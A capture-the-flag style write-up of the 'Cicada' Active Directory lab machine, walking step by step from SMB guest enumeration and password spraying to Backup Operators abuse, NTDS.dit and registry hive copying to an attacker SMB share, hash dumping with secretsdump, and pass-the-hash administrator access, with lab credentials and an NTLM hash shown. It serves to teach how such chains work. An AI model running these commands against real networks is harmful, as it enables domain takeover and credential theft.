Overview
Cicada is an Active Directory machine that demonstrates how exposed SMB shares and poor credential handling can lead to domain compromise through credential reuse, script-based password disclosure, and abuse of Backup Operators privileges.
Attack Chain
- Enumerate exposed Active Directory services
- Discover readable SMB shares as
Guest - Extract default password from
HR notice - Enumerate domain users using RID brute forcing
- Password spray default credentials
- Discover credentials in AD user description
- Access DEV share and recover script-stored credentials
- Gain WinRM access as
emily.oscars - Abuse
Backup Operatorsprivileges - Create a shadow copy with
diskshadow - Copy
NTDS,SYSTEM, andSECURITY - Dump domain hashes with
impacket-secretsdump - Authenticate as Administrator using pass-the-hash
Enumeration
Port Scanning
We start by defining the target and running a full TCP port scan to identify the exposed services.
export IP=10.129.231.149; export NAME=CICADA; echo $IP; echo $NAME; ping $IP -c 1
nmap --min-rate 4500 --max-rtt-timeout 1500ms $IP -Pn -n -p- -v -oA scans/nmap_allports_$NAME
ports=$(cat scans/nmap_allports_$NAME.nmap | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); echo $ports
nmap $IP -p$ports -Pn --disable-arp-ping -sC -sV -oA scans/nmap_initial_$NAME -v
Findings
The scan results indicate that the target is part of an Active Directory environment. Key services include DNS (53), Kerberos (88), RPC (135), and SMB (139, 445), along with LDAP (389, 636) and the Global Catalog on 3268 and 3269. Additionally, WinRM (5985) is exposed, which is often useful later for remote access.
From the service banners and LDAP information, the domain is identified as cicada.htb, and the host appears to be the domain controller CICADA-DC.
To confirm the domain naming context, we query LDAP anonymously.
ldapsearch -H ldap://$IP -x -s base namingcontexts
The result confirms the domain as cicada.htb, which is added to /etc/hosts for proper name resolution.
echo "$IP cicada.htb" | sudo tee -a /etc/hosts
SMB Enumeration
Guest Share Access
With SMB exposed, we test whether Guest access is allowed and enumerate available shares.
python3 ~/Tools/smbmap/smbmap/smbmap.py -H $IP -u "Guest" -p ""
The HR share is readable, which makes it the first interesting target.
python3 ~/Tools/smbmap/smbmap/smbmap.py -H $IP -u "Guest" -p "" -r HR --depth 10
HR Notice Disclosure
We connect to the share using smbclient and download the file.
smbclient //$IP/HR --user=cicada.htb/Guest --password=''
get "Notice from HR.txt"
Reading the file reveals a default password intended for new employees.
cat Notice\ from\ HR.txt
The exposed password is:
Cicada$M6Corpb*@Lp#nZp!8
At this point, we have a password but still need valid usernames to test it against.
User Enumeration
RID Brute Force
To build a user list, we enumerate domain SIDs using impacket-lookupsid.
impacket-lookupsid 'cicada.htb/guest'@$IP -no-pass
The same can also be done with netexec using RID brute forcing.
nxc smb $IP -u 'Guest' -p '' --rid-brute
For the rest of the enumeration, we work with the impacket-lookupsid output and save it to a file.
Building a User List
The raw output includes both users and groups, so we filter for user objects and format the results into a clean username list.
cat creds/users_raw.txt | grep -i user | awk '{print $2}' | awk -F\\ '{print $2}' > creds/users_potential.txt
The resulting file gives us a usable list of potential domain users.
Foothold
Password Spraying
Using the default password, Cicada$M6Corpb*@Lp#nZp!8, found in the HR notice, we perform a password spray against the enumerated users.
nxc smb $IP -u creds/users_potential.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
The spray succeeds for michael.wrightson.
michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
Credential Discovery via AD Description
With valid credentials, we enumerate domain users again to check for additional information.
nxc smb $IP -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
The output reveals another credential in a user description field:
david.orelious:aRt$Lp#7t*VQ!3
DEV Share Access
We use the david.orelious credentials to enumerate SMB shares.
python3 ~/Tools/smbmap/smbmap/smbmap.py -u david.orelious -p aRt\$Lp\#7t\*VQ\!3 -d cicada.htb -H $IP
This account has read access to the DEV share.
We connect to the share and download the PowerShell backup script.
smbclient //$IP/DEV --user=cicada.htb/david.orelious
get Backup_script.ps1
Reviewing the script reveals another set of credentials.
cat Backup_script.ps1
The discovered credentials belong to emily.oscars.
emily.oscars:Q!3@Lp#M6b*7t*Vt
Initial Access
We validate the credentials over SMB and WinRM.
nxc smb $IP -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
nxc winrm $IP -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
WinRM access is allowed, so we establish an interactive shell.
evil-winrm -i $IP -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
We can now read the user flag.
type C:\Users\emily.oscars.CICADA\Desktop\user.txt
Privilege Escalation
Initial Enumeration
After gaining access as emily.oscars, we begin by checking group membership.
net user emily.oscars /domain
The account is a member of the Backup Operators group. This is highly significant because members of this group can often read sensitive system files if the right privileges are enabled.
We confirm the assigned privileges.
whoami /priv
Both SeBackupPrivilege and SeRestorePrivilege are enabled.
Exploit Privileges
The privilege escalation path is to abuse SeBackupPrivilege to copy protected files from the domain controller. To access locked files such as NTDS.dit, we first create a shadow copy of the C: drive using diskshadow.
We create a diskshadow.txt file locally with the following contents:
set context persistent nowriters
add volume c: alias temp
create
expose %temp% h:
exit
Because this file will be executed on Windows, we convert it to DOS format.
unix2dos diskshadow.txt
Execution
We transfer the file to the target.
iwr -uri http://10.10.14.89/diskshadow.txt -o c:\windows\temp\diskshadow.txt
We execute diskshadow using the prepared script, which creates and exposes a shadow copy as drive H:.
diskshadow /s c:\windows\temp\diskshadow.txt
To make full use of the backup privileges, we download the SeBackupPrivilege PowerShell modules from the following project:
https://github.com/giuliano108/SeBackupPrivilege
Transfer the required DLL files to the target.
iwr -uri http://10.10.14.89/SeBackupPrivilege/SeBackupPrivilegeCmdLets.dll -o ./SeBackupPrivilegeCmdLets.dll
iwr -uri http://10.10.14.89/SeBackupPrivilege/SeBackupPrivilegeUtils.dll -o ./SeBackupPrivilegeUtils.dll
Import the modules.
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
We now copy NTDS.dit, SYSTEM, and SECURITY from the shadow copy into a writable location, like C:\Windows\Temp
Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\windows\temp\NTDS -Overwrite
Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM c:\windows\temp\SYSTEM -Overwrite
Copy-FileSeBackupPrivilege h:\windows\system32\config\SECURITY c:\windows\temp\SECURITY -Overwrite
With the files copied into C:\Windows\Temp, we transfer them back to our attacking machine over SMB.
copy c:\windows\temp\NTDS \\10.10.14.89\SMBtransfer\NTDS
copy c:\windows\temp\SYSTEM \\10.10.14.89\SMBtransfer\SYSTEM
copy c:\windows\temp\SECURITY \\10.10.14.89\SMBtransfer\SECURITY
Once the files are local, we use impacket-secretsdump to extract the domain hashes.
impacket-secretsdump -ntds NTDS -security SECURITY -system SYSTEM LOCAL
This reveals the Administrator NTLM hash.
Administrator:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341
Administrator Shell
We verify the Administrator hash with netexec.
nxc smb $IP -u 'administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
nxc winrm $IP -u 'administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
With WinRM access confirmed, we authenticate using pass-the-hash.
evil-winrm -i $IP -u 'administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
The shell confirms administrative access on the domain controller.
Read the root flag
type C:\Users\Administrator\Desktop\root.txt
Key Takeaways
Cicada shows how small Active Directory mistakes can chain together into full compromise. Readable SMB shares exposed a default password, user descriptions and scripts leaked additional credentials, and membership in Backup Operators allowed sensitive domain files to be copied and dumped for Administrator access.